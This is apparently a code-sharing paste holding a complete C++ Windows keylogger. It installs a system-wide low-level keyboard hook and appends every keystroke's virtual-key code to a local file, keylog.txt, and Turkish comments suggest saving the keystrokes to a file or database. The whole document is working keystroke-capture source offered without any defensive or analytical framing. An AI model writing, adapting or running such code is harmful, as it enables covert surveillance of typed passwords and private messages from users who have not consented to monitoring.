Untitled

mail@pastecode.io avatar
unknown
plain_text
a year ago
1.2 kB
1
Indexable
Never
#include <iostream>
#include <fstream>
#include <Windows.h>

LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
  if (nCode >= 0) {
    if (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN) {
      KBDLLHOOKSTRUCT* kbdStruct = reinterpret_cast<KBDLLHOOKSTRUCT*>(lParam);
      DWORD vkCode = kbdStruct->vkCode;

      // Tuş vuruşunu kaydetmek için istediğiniz işlemleri burada yapabilirsiniz.
      // Örneğin, bir dosyaya yazabilir veya veritabanına kaydedebilirsiniz.

      std::ofstream logFile("keylog.txt", std::ios::app);
      if (logFile) {
        logFile << vkCode << std::endl;
        logFile.close();
      }
    }
  }

  return CallNextHookEx(nullptr, nCode, wParam, lParam);
}

int main() {
  HHOOK hook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardProc, GetModuleHandle(nullptr), 0);
  if (!hook) {
    std::cout << "Hata: Klavye kancası kurulamadı!" << std::endl;
    return 1;
  }

  MSG msg;
  while (GetMessage(&msg, nullptr, 0, 0)) {
    TranslateMessage(&msg);
    DispatchMessage(&msg);
  }

  UnhookWindowsHookEx(hook);

  return 0;
}